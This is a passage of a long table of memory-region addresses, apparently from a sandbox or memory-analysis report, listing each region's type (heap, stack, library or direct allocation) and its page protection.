|
page read and write
|
||
|
3C6000
|
heap
|
page read and write
|
||
|
32E0000
|
trusted library allocation
|
page read and write
|
||
|
1A7C4000
|
heap
|
page read and write
|
||
|
7FE89A37000
|
trusted library allocation
|
page read and write
|
||
|
3C56000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
5A0B000
|
heap
|
page read and write
|
||
|
39DF000
|
heap
|
page read and write
|
||
|
49C9000
|
heap
|
page read and write
|
||
|
1B260000
|
heap
|
page read and write
|
||
|
39ED000
|
heap
|
page read and write
|
||
|
4603000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
47F0000
|
heap
|
page read and write
|
||
|
479000
|
heap
|
page read and write
|
||
|
2DA000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
49C9000
|
heap
|
page read and write
|
||
|
3955000
|
heap
|
page read and write
|
||
|
473F000
|
heap
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
398F000
|
heap
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
294000
|
heap
|
page read and write
|
||
|
3CDB000
|
heap
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
3ADA000
|
trusted library allocation
|
page read and write
|
||
|
3FE000
|
heap
|
page read and write
|
||
|
5A0D000
|
heap
|
page read and write
|
||
|
3C54000
|
heap
|
page read and write
|
||
|
294000
|
heap
|
page read and write
|
||
|
254000
|
heap
|
page read and write
|
||
|
37A0000
|
trusted library allocation
|
page read and write
|
||
|
49FD000
|
heap
|
page read and write
|
||
|
5748000
|
heap
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
475F000
|
heap
|
page read and write
|
||
|
35E000
|
heap
|
page read and write
|
||
|
396C000
|
heap
|
page read and write
|
||
|
4600000
|
heap
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
5A0B000
|
heap
|
page read and write
|
||
|
7FE89893000
|
trusted library allocation
|
page read and write
|
||
|
1F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
3911000
|
heap
|
page read and write
|
||
|
384000
|
heap
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
475F000
|
heap
|
page read and write
|
||
|
584B000
|
heap
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
5FF000
|
heap
|
page read and write
|
||
|
5924000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1C439000
|
heap
|
page read and write
|
||
|
3185000
|
trusted library allocation
|
page read and write
|
||
|
3640000
|
trusted library allocation
|
page read and write
|
||
|
1A4B8000
|
heap
|
page execute and read and write
|
||
|
264E000
|
stack
|
page read and write
|
||
|
3C6A000
|
heap
|
page read and write
|
||
|
586F000
|
heap
|
page read and write
|
||
|
4B2000
|
heap
|
page read and write
|
||
|
1C365000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
39D3000
|
heap
|
page read and write
|
||
|
57B2000
|
heap
|
page read and write
|
||
|
435000
|
heap
|
page read and write
|
||
|
3975000
|
heap
|
page read and write
|
||
|
2C5A000
|
trusted library allocation
|
page read and write
|
||
|
20AF000
|
stack
|
page read and write
|
||
|
4795000
|
heap
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
452F000
|
heap
|
page read and write
|
||
|
3987000
|
heap
|
page read and write
|
||
|
3AF1000
|
trusted library allocation
|
page read and write
|
||
|
7FE89936000
|
trusted library allocation
|
page read and write
|
||
|
49FB000
|
heap
|
page read and write
|
||
|
7FE89C20000
|
trusted library allocation
|
page read and write
|
||
|
5A0B000
|
heap
|
page read and write
|
||
|
5650000
|
heap
|
page read and write
|
||
|
376000
|
heap
|
page read and write
|
||
|
3C92000
|
heap
|
page read and write
|
||
|
316E000
|
stack
|
page read and write
|
||
|
352A000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A50000
|
trusted library allocation
|
page execute and read and write
|
||
|
5734000
|
heap
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
1A700000
|
heap
|
page read and write
|
||
|
27D000
|
heap
|
page read and write
|
||
|
310000
|
heap
|
page read and write
|
||
|
1D25000
|
heap
|
page read and write
|
||
|
3EB000
|
heap
|
page read and write
|
||
|
3179000
|
trusted library allocation
|
page read and write
|
||
|
5828000
|
heap
|
page read and write
|
||
|
59D0000
|
heap
|
page read and write
|
||
|
576B000
|
heap
|
page read and write
|
||
|
1C1D0000
|
heap
|
page read and write
|
||
|
1FD3000
|
direct allocation
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
1C0FE000
|
stack
|
page read and write
|
||
|
3981000
|
trusted library allocation
|
page read and write
|
||
|
3D07000
|
heap
|
page read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
59CD000
|
heap
|
page read and write
|
||
|
49F7000
|
heap
|
page read and write
|
||
|
4921000
|
heap
|
page read and write
|
||
|
4721000
|
heap
|
page read and write
|
||
|
49C9000
|
heap
|
page read and write
|
||
|
549B000
|
heap
|
page read and write
|
||
|
3523000
|
trusted library allocation
|
page read and write
|
||
|
59D0000
|
heap
|
page read and write
|
||
|
257D000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B89000
|
trusted library allocation
|
page read and write
|
||
|
441000
|
heap
|
page read and write
|
||
|
1C8F0000
|
heap
|
page read and write
|
||
|
5080000
|
trusted library allocation
|
page read and write
|
||
|
483000
|
heap
|
page read and write
|
||
|
44C6000
|
heap
|
page read and write
|
||
|
5734000
|
heap
|
page read and write
|
||
|
5A18000
|
heap
|
page read and write
|
||
|
324E000
|
stack
|
page read and write
|
||
|
57ED000
|
heap
|
page read and write
|
||
|
3C2000
|
heap
|
page read and write
|
||
|
7FFFFF85000
|
trusted library allocation
|
page execute read
|
||
|
1AF8B000
|
heap
|
page read and write
|
||
|
581C000
|
heap
|
page read and write
|
||
|
3B80000
|
trusted library allocation
|
page read and write
|
||
|
195000
|
stack
|
page read and write
|
||
|
592F000
|
heap
|
page read and write
|
||
|
3D07000
|
heap
|
page read and write
|
||
|
17B000
|
stack
|
page read and write
|
||
|
59C8000
|
heap
|
page read and write
|
||
|
1D60000
|
trusted library allocation
|
page read and write
|
||
|
45FE000
|
heap
|
page read and write
|
||
|
3DF000
|
heap
|
page read and write
|
||
|
510000
|
heap
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
3E6000
|
heap
|
page read and write
|
||
|
3852000
|
heap
|
page read and write
|
||
|
3E0B000
|
stack
|
page read and write
|
||
|
B54000
|
direct allocation
|
page execute and read and write
|
||
|
298F000
|
trusted library allocation
|
page read and write
|
||
|
45D7000
|
heap
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
1DE0000
|
heap
|
page read and write
|
||
|
7FE89940000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F90000
|
direct allocation
|
page read and write
|
||
|
398D000
|
heap
|
page read and write
|
||
|
1D30000
|
direct allocation
|
page read and write
|
||
|
39ED000
|
heap
|
page read and write
|
||
|
3BF000
|
heap
|
page read and write
|
||
|
27DB000
|
trusted library allocation
|
page read and write
|
||
|
44A8000
|
heap
|
page read and write
|
||
|
45F2000
|
heap
|
page read and write
|
||
|
23C000
|
heap
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
4E2000
|
heap
|
page read and write
|
||
|
234000
|
heap
|
page read and write
|
||
|
49FF000
|
heap
|
page read and write
|
||
|
40F000
|
heap
|
page read and write
|
||
|
3A00000
|
trusted library allocation
|
page read and write
|
||
|
1AB49000
|
stack
|
page read and write
|
||
|
35E000
|
heap
|
page read and write
|
||
|
7FE89996000
|
trusted library allocation
|
page execute and read and write
|
||
|
39EC000
|
heap
|
page read and write
|
||
|
56D2000
|
heap
|
page read and write
|
||
|
7FE89A50000
|
trusted library allocation
|
page read and write
|
||
|
1FC3000
|
direct allocation
|
page read and write
|
||
|
7FE89BA5000
|
trusted library allocation
|
page read and write
|
||
|
2985000
|
heap
|
page read and write
|
||
|
49CC000
|
heap
|
page read and write
|
||
|
514000
|
heap
|
page read and write
|
||
|
4E9000
|
heap
|
page read and write
|
||
|
39D9000
|
heap
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
397000
|
direct allocation
|
page read and write
|
||
|
565C000
|
heap
|
page read and write
|
||
|
5A02000
|
heap
|
page read and write
|
||
|
4795000
|
heap
|
page read and write
|
||
|
4605000
|
heap
|
page read and write
|
||
|
452D000
|
heap
|
page read and write
|
||
|
2E60000
|
heap
|
page read and write
|
||
|
5753000
|
heap
|
page read and write
|
||
|
3CD2000
|
heap
|
page read and write
|
||
|
1BD000
|
stack
|
page read and write
|
||
|
7FE8989B000
|
trusted library allocation
|
page read and write
|
||
|
49F000
|
heap
|
page read and write
|
||
|
418000
|
heap
|
page read and write
|
||
|
3118000
|
trusted library allocation
|
page read and write
|
||
|
2595000
|
heap
|
page read and write
|
||
|
7FE89A88000
|
trusted library allocation
|
page read and write
|
||
|
3A8000
|
heap
|
page read and write
|
||
|
453B000
|
heap
|
page read and write
|
||
|
1AF3E000
|
stack
|
page read and write
|
||
|
4994000
|
heap
|
page read and write
|
||
|
450000
|
trusted library allocation
|
page read and write
|
||
|
59DD000
|
heap
|
page read and write
|
||
|
389000
|
heap
|
page read and write
|
||
|
3C55000
|
heap
|
page read and write
|
||
|
4B3000
|
heap
|
page read and write
|
||
|
1C23D000
|
heap
|
page read and write
|
||
|
3C3000
|
heap
|
page read and write
|
||
|
88B1000
|
trusted library allocation
|
page read and write
|
||
|
49A2000
|
heap
|
page read and write
|
||
|
5A1A000
|
heap
|
page read and write
|
||
|
7FE89884000
|
trusted library allocation
|
page read and write
|
||
|
45FD000
|
heap
|
page read and write
|
||
|
4E5000
|
heap
|
page read and write
|
||
|
26F4000
|
heap
|
page read and write
|
||
|
7FE89C30000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
5804000
|
heap
|
page read and write
|
||
|
5514000
|
heap
|
page read and write
|
||
|
27D3000
|
trusted library allocation
|
page read and write
|
||
|
3E09000
|
heap
|
page read and write
|
||
|
1C462000
|
heap
|
page read and write
|
||
|
4795000
|
heap
|
page read and write
|
||
|
394B000
|
heap
|
page read and write
|
||
|
57A6000
|
heap
|
page read and write
|
||
|
5A16000
|
heap
|
page read and write
|
||
|
17D000
|
stack
|
page read and write
|
||
|
2E8000
|
heap
|
page read and write
|
||
|
12464000
|
trusted library allocation
|
page read and write
|
||
|
3959000
|
heap
|
page read and write
|
||
|
5A11000
|
heap
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
476000
|
heap
|
page read and write
|
||
|
4410000
|
heap
|
page read and write
|
||
|
1D50000
|
direct allocation
|
page read and write
|
||
|
38D000
|
heap
|
page read and write
|
||
|
BC000
|
stack
|
page read and write
|
||
|
4AD000
|
heap
|
page read and write
|
||
|
7FE89A67000
|
trusted library allocation
|
page read and write
|
||
|
60B1000
|
trusted library allocation
|
page read and write
|
||
|
4C0000
|
direct allocation
|
page read and write
|
||
|
49FB000
|
heap
|
page read and write
|
||
|
320000
|
heap
|
page read and write
|
||
|
31C000
|
heap
|
page read and write
|
||
|
2590000
|
heap
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
466000
|
heap
|
page read and write
|
||
|
2AC000
|
stack
|
page read and write
|
||
|
27DB000
|
trusted library allocation
|
page read and write
|
||
|
3185000
|
trusted library allocation
|
page read and write
|
||
|
3C6000
|
heap
|
page read and write
|
||
|
1ABA0000
|
heap
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
27D5000
|
trusted library allocation
|
page read and write
|
||
|
568B000
|
heap
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
27C0000
|
remote allocation
|
page read and write
|
||
|
3C97000
|
heap
|
page read and write
|
||
|
7FE89C26000
|
trusted library allocation
|
page read and write
|
||
|
4990000
|
heap
|
page read and write
|
||
|
27D7000
|
trusted library allocation
|
page read and write
|
||
|
1A2F0000
|
heap
|
page read and write
|
||
|
47EA000
|
heap
|
page read and write
|
||
|
583F000
|
heap
|
page read and write
|
||
|
479000
|
heap
|
page read and write
|
||
|
1C42F000
|
heap
|
page read and write
|
||
|
22A000
|
heap
|
page read and write
|
||
|
430000
|
heap
|
page read and write
|
||
|
3CD5000
|
heap
|
page read and write
|
||
|
1CEB000
|
heap
|
page read and write
|
||
|
38B1000
|
trusted library allocation
|
page read and write
|
||
|
3A5D000
|
stack
|
page read and write
|
||
|
1F30000
|
heap
|
page read and write
|
||
|
49CB000
|
heap
|
page read and write
|
||
|
2110000
|
heap
|
page execute and read and write
|
||
|
35D000
|
heap
|
page read and write
|
||
|
366000
|
heap
|
page read and write
|
||
|
1C21F000
|
heap
|
page read and write
|
||
|
367000
|
heap
|
page read and write
|
||
|
3AF4000
|
trusted library allocation
|
page read and write
|
||
|
3959000
|
heap
|
page read and write
|
||
|
2905000
|
trusted library allocation
|
page read and write
|
||
|
3B80000
|
trusted library allocation
|
page read and write
|
||
|
5FD000
|
heap
|
page read and write
|
||
|
57E1000
|
heap
|
page read and write
|
||
|
3970000
|
heap
|
page read and write
|
||
|
3D0E000
|
heap
|
page read and write
|
||
|
27DB000
|
trusted library allocation
|
page read and write
|
||
|
49CC000
|
heap
|
page read and write
|
||
|
34F0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
7FE898B2000
|
trusted library allocation
|
page read and write
|
||
|
45F6000
|
heap
|
page read and write
|
||
|
3973000
|
heap
|
page read and write
|
||
|
4C6000
|
heap
|
page read and write
|
||
|
1A7000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
604000
|
heap
|
page read and write
|
||
|
57F000
|
heap
|
page read and write
|
||
|
3130000
|
heap
|
page read and write
|
||
|
464000
|
heap
|
page read and write
|
||
|
4603000
|
heap
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
378000
|
heap
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
|
7FE898D0000
|
trusted library allocation
|
page read and write
|
||
|
2BB3000
|
trusted library allocation
|
page read and write
|
||
|
44C6000
|
heap
|
page read and write
|
||
|
445E000
|
heap
|
page read and write
|
||
|
42D000
|
heap
|
page read and write
|
||
|
3849000
|
heap
|
page read and write
|
||
|
1C15F000
|
stack
|
page read and write
|
||
|
3800000
|
heap
|
page read and write
|
||
|
5673000
|
heap
|
page read and write
|
||
|
22BF000
|
stack
|
page read and write
|
||
|
45F3000
|
heap
|
page read and write
|
||
|
5667000
|
heap
|
page read and write
|
||
|
3B80000
|
trusted library allocation
|
page read and write
|
||
|
27D9000
|
trusted library allocation
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
36B000
|
heap
|
page read and write
|
||
|
7FFFFF82000
|
trusted library allocation
|
page readonly
|
||
|
59D8000
|
heap
|
page read and write
|
||
|
5A18000
|
heap
|
page read and write
|
||
|
2E00000
|
trusted library allocation
|
page execute
|
||
|
24F000
|
heap
|
page read and write
|
||
|
246000
|
heap
|
page read and write
|
||
|
41A0000
|
trusted library allocation
|
page read and write
|
||
|
59D6000
|
heap
|
page read and write
|
||
|
5A1D000
|
heap
|
page read and write
|
||
|
1239F000
|
trusted library allocation
|
page read and write
|
||
|
3C6000
|
heap
|
page read and write
|
||
|
3BB000
|
heap
|
page read and write
|
||
|
45F6000
|
heap
|
page read and write
|
||
|
1B12E000
|
stack
|
page read and write
|
||
|
1C2CB000
|
heap
|
page read and write
|
||
|
1DA4000
|
heap
|
page read and write
|
||
|
3852000
|
heap
|
page read and write
|
||
|
453C000
|
heap
|
page read and write
|
||
|
279000
|
heap
|
page read and write
|
||
|
5A0B000
|
heap
|
page read and write
|
||
|
47F1000
|
heap
|
page read and write
|
||
|
3661000
|
trusted library allocation
|
page read and write
|
||
|
1B06F000
|
stack
|
page read and write
|
||
|
474E000
|
stack
|
page read and write
|
||
|
4F1000
|
heap
|
page read and write
|
||
|
3F9000
|
heap
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
36B000
|
heap
|
page read and write
|
||
|
45FE000
|
heap
|
page read and write
|
||
|
4B8000
|
heap
|
page read and write
|
||
|
5A16000
|
heap
|
page read and write
|
||
|
57F5000
|
heap
|
page read and write
|
||
|
2391000
|
trusted library allocation
|
page read and write
|
||
|
5A13000
|
heap
|
page read and write
|
||
|
3DF000
|
heap
|
page read and write
|
||
|
4605000
|
heap
|
page read and write
|
||
|
42E000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
195000
|
heap
|
page read and write
|
||
|
1C372000
|
heap
|
page read and write
|
||
|
58AA000
|
heap
|
page read and write
|
||
|
27DE000
|
trusted library allocation
|
page read and write
|
||
|
24B000
|
heap
|
page read and write
|
||
|
1B7000
|
heap
|
page read and write
|
||
|
44C8000
|
heap
|
page read and write
|
||
|
4737000
|
heap
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
4DD000
|
direct allocation
|
page read and write
|
||
|
328F000
|
trusted library allocation
|
page read and write
|
||
|
122F1000
|
trusted library allocation
|
page read and write
|
||
|
3962000
|
heap
|
page read and write
|
||
|
1A390000
|
heap
|
page read and write
|
||
|
59D8000
|
heap
|
page read and write
|
||
|
396F000
|
heap
|
page read and write
|
||
|
3D0E000
|
heap
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
475F000
|
heap
|
page read and write
|
||
|
44B5000
|
heap
|
page read and write
|
||
|
3BE000
|
heap
|
page read and write
|
||
|
3975000
|
heap
|
page read and write
|
||
|
3C8000
|
heap
|
page read and write
|
||
|
3DF000
|
heap
|
page read and write
|
||
|
4920000
|
heap
|
page read and write
|
||
|
4381000
|
trusted library allocation
|
page read and write
|
||
|
1C9B0000
|
heap
|
page read and write
|
||
|
475F000
|
heap
|
page read and write
|
||
|
3ACE000
|
stack
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
59C6000
|
heap
|
page read and write
|
||
|
1C1FC000
|
stack
|
page read and write
|
||
|
49FD000
|
heap
|
page read and write
|
||
|
3AD3000
|
trusted library allocation
|
page read and write
|
||
|
44C6000
|
heap
|
page read and write
|
||
|
550D000
|
heap
|
page read and write
|
||
|
5A06000
|
heap
|
page read and write
|
||
|
3975000
|
heap
|
page read and write
|
||
|
218000
|
heap
|
page read and write
|
||
|
1FC7000
|
direct allocation
|
page read and write
|
||
|
26E000
|
heap
|
page read and write
|
||
|
3F9000
|
heap
|
page read and write
|
||
|
3179000
|
trusted library allocation
|
page read and write
|
||
|
4720000
|
heap
|
page read and write
|
||
|
1D90000
|
heap
|
page read and write
|
||
|
3AD0000
|
trusted library allocation
|
page read and write
|
||
|
3AD000
|
direct allocation
|
page read and write
|
||
|
4411000
|
heap
|
page read and write
|
||
|
2E40000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
20C000
|
heap
|
page read and write
|
||
|
24F4000
|
trusted library allocation
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
56C1000
|
heap
|
page read and write
|
||
|
3904000
|
heap
|
page read and write
|
||
|
2040000
|
heap
|
page execute and read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
39E5000
|
heap
|
page read and write
|
||
|
380000
|
heap
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
1B560000
|
heap
|
page read and write
|
||
|
56B1000
|
trusted library allocation
|
page read and write
|
||
|
1C89B000
|
stack
|
page read and write
|
||
|
45D5000
|
heap
|
page read and write
|
||
|
49A4000
|
heap
|
page read and write
|
||
|
49A8000
|
heap
|
page read and write
|
||
|
499A000
|
heap
|
page read and write
|
||
|
4796000
|
heap
|
page read and write
|
||
|
27DE000
|
trusted library allocation
|
page read and write
|
||
|
3CE6000
|
heap
|
page read and write
|
||
|
4FF000
|
heap
|
page read and write
|
||
|
479000
|
heap
|
page read and write
|
||
|
541F000
|
heap
|
page read and write
|
||
|
32E000
|
heap
|
page read and write
|
||
|
20F000
|
heap
|
page read and write
|
||
|
39CF000
|
heap
|
page read and write
|
||
|
37D000
|
heap
|
page read and write
|
||
|
7FE89882000
|
trusted library allocation
|
page read and write
|
||
|
495000
|
heap
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
46D000
|
heap
|
page read and write
|
||
|
57E000
|
heap
|
page read and write
|
||
|
3801000
|
heap
|
page read and write
|
||
|
59D0000
|
heap
|
page read and write
|
||
|
234F000
|
trusted library allocation
|
page read and write
|
||
|
3959000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3C97000
|
heap
|
page read and write
|
||
|
A60000
|
direct allocation
|
page execute and read and write
|
||
|
4269000
|
heap
|
page read and write
|
||
|
460000
|
heap
|
page read and write
|
||
|
1E60000
|
heap
|
page read and write
|
||
|
1A709000
|
heap
|
page read and write
|
||
|
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
|
5A4000
|
heap
|
page read and write
|
||
|
3A6000
|
heap
|
page read and write
|
||
|
1C66000
|
heap
|
page read and write
|
||
|
42B1000
|
trusted library allocation
|
page read and write
|
||
|
1C74C000
|
stack
|
page read and write
|
||
|
499F000
|
heap
|
page read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
3BE000
|
heap
|
page read and write
|
||
|
3959000
|
heap
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
4999000
|
heap
|
page read and write
|
||
|
4A6000
|
heap
|
page read and write
|
||
|
1A75D000
|
heap
|
page read and write
|
||
|
49C9000
|
heap
|
page read and write
|
||
|
3A60000
|
trusted library allocation
|
page read and write
|
||
|
5512000
|
heap
|
page read and write
|
||
|
3CC8000
|
heap
|
page read and write
|
||
|
453B000
|
heap
|
page read and write
|
||
|
3CAF000
|
stack
|
page read and write
|
||
|
5781000
|
trusted library allocation
|
page read and write
|
||
|
49B000
|
heap
|
page read and write
|
||
|
28D000
|
heap
|
page read and write
|
||
|
33BB000
|
stack
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
3CB0000
|
heap
|
page read and write
|
||
|
229F000
|
stack
|
page read and write
|
||
|
1F80000
|
direct allocation
|
page read and write
|
||
|
2D80000
|
trusted library allocation
|
page read and write
|
||
|
D50000
|
direct allocation
|
page execute and read and write
|
||
|
31A000
|
heap
|
page read and write
|
||
|
6181000
|
trusted library allocation
|
page read and write
|
||
|
3DF000
|
heap
|
page read and write
|
||
|
37E000
|
heap
|
page read and write
|
||
|
4CB000
|
heap
|
page read and write
|
||
|
173000
|
stack
|
page read and write
|
||
|
49F7000
|
heap
|
page read and write
|
||
|
7FE89A3C000
|
trusted library allocation
|
page read and write
|
||
|
3179000
|
trusted library allocation
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
3F0000
|
direct allocation
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
57A000
|
heap
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
3910000
|
trusted library allocation
|
page read and write
|
||
|
4260000
|
heap
|
page read and write
|
||
|
7FE89C80000
|
trusted library allocation
|
page read and write
|
||
|
1A838000
|
heap
|
page execute and read and write
|
||
|
59DA000
|
heap
|
page read and write
|
||
|
59CD000
|
heap
|
page read and write
|
||
|
5A1D000
|
heap
|
page read and write
|
||
|
364000
|
heap
|
page read and write
|
||
|
600000
|
heap
|
page read and write
|
||
|
5715000
|
heap
|
page read and write
|
||
|
452F000
|
heap
|
page read and write
|
||
|
3E9E000
|
stack
|
page read and write
|
||
|
5A16000
|
heap
|
page read and write
|
||
|
3CD4000
|
heap
|
page read and write
|
||
|
446000
|
heap
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
1AB38000
|
heap
|
page read and write
|
||
|
5494000
|
heap
|
page read and write
|
||
|
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A62000
|
trusted library allocation
|
page read and write
|
||
|
1B1F4000
|
heap
|
page read and write
|
||
|
B50000
|
direct allocation
|
page execute and read and write
|
||
|
5A18000
|
heap
|
page read and write
|
||
|
27F000
|
heap
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
27D1000
|
trusted library allocation
|
page read and write
|
||
|
1AACF000
|
stack
|
page read and write
|
||
|
39F5000
|
trusted library allocation
|
page read and write
|
||
|
3973000
|
heap
|
page read and write
|
||
|
334000
|
heap
|
page read and write
|
||
|
5736000
|
heap
|
page read and write
|
||
|
39DB000
|
heap
|
page read and write
|
||
|
44AC000
|
heap
|
page read and write
|
||
|
595000
|
heap
|
page read and write
|
||
|
2905000
|
trusted library allocation
|
page read and write
|
||
|
391000
|
heap
|
page read and write
|
||
|
2391000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A22000
|
trusted library allocation
|
page read and write
|
||
|
2593000
|
trusted library allocation
|
page read and write
|
||
|
5A1D000
|
heap
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
25CB000
|
heap
|
page read and write
|
||
|
1CB5000
|
heap
|
page read and write
|
||
|
541A000
|
heap
|
page read and write
|
||
|
4999000
|
heap
|
page read and write
|
||
|
1D59000
|
heap
|
page read and write
|
||
|
1A70B000
|
heap
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
3851000
|
heap
|
page read and write
|
||
|
44B0000
|
heap
|
page read and write
|
||
|
499F000
|
heap
|
page read and write
|
||
|
7FE89A80000
|
trusted library allocation
|
page read and write
|
||
|
B57000
|
direct allocation
|
page execute and read and write
|
||
|
45FD000
|
heap
|
page read and write
|
||
|
1D30000
|
direct allocation
|
page read and write
|
||
|
375000
|
heap
|
page read and write
|
||
|
1EF000
|
trusted library allocation
|
page read and write
|
||
|
39CF000
|
heap
|
page read and write
|
||
|
1E0000
|
trusted library allocation
|
page read and write
|
||
|
575F000
|
heap
|
page read and write
|
||
|
4AD000
|
heap
|
page read and write
|
||
|
5730000
|
heap
|
page read and write
|
||
|
1DD0000
|
heap
|
page read and write
|
||
|
3185000
|
trusted library allocation
|
page read and write
|
||
|
690000
|
heap
|
page read and write
|
||
|
5A0F000
|
heap
|
page read and write
|
||
|
589E000
|
heap
|
page read and write
|
||
|
3790000
|
heap
|
page read and write
|
||
|
1C290000
|
heap
|
page read and write
|
||
|
38D000
|
heap
|
page read and write
|
||
|
367000
|
heap
|
page read and write
|
||
|
5A1A000
|
heap
|
page read and write
|
||
|
4E9000
|
heap
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
|
2EC000
|
heap
|
page read and write
|
||
|
27D9000
|
trusted library allocation
|
page read and write
|
||
|
3CD6000
|
heap
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
39EB000
|
heap
|
page read and write
|
||
|
58C1000
|
heap
|
page read and write
|
||
|
49A2000
|
heap
|
page read and write
|
||
|
5418000
|
heap
|
page read and write
|
||
|
49BE000
|
heap
|
page read and write
|
||
|
44A8000
|
heap
|
page read and write
|
||
|
381000
|
heap
|
page read and write
|
||
|
452D000
|
heap
|
page read and write
|
||
|
2905000
|
trusted library allocation
|
page read and write
|
||
|
49F7000
|
heap
|
page read and write
|
||
|
2905000
|
trusted library allocation
|
page read and write
|
||
|
1C423000
|
heap
|
page read and write
|
||
|
3DF000
|
heap
|
page read and write
|
||
|
421F000
|
stack
|
page read and write
|
||
|
29FA000
|
trusted library allocation
|
page read and write
|
||
|
830000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
2114000
|
trusted library allocation
|
page read and write
|
||
|
389000
|
heap
|
page read and write
|
||
|
3204000
|
trusted library allocation
|
page read and write
|
||
|
4A9000
|
heap
|
page read and write
|
||
|
579A000
|
heap
|
page read and write
|
||
|
290000
|
heap
|
page read and write
|
||
|
2A0000
|
heap
|
page read and write
|
||
|
3AC000
|
heap
|
page read and write
|
||
|
1AAFA000
|
heap
|
page read and write
|
||
|
3971000
|
heap
|
page read and write
|
||
|
27E000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
5701000
|
heap
|
page read and write
|
||
|
3CB1000
|
heap
|
page read and write
|
||
|
2484000
|
heap
|
page read and write
|
||
|
279000
|
heap
|
page read and write
|
||
|
4921000
|
heap
|
page read and write
|
||
|
3CC8000
|
heap
|
page read and write
|
||
|
57C000
|
heap
|
page read and write
|
||
|
3987000
|
heap
|
page read and write
|
||
|
74B1000
|
trusted library allocation
|
page read and write
|
||
|
27DE000
|
trusted library allocation
|
page read and write
|
||
|
24F000
|
heap
|
page read and write
|
||
|
59D6000
|
heap
|
page read and write
|
||
|
2E7000
|
heap
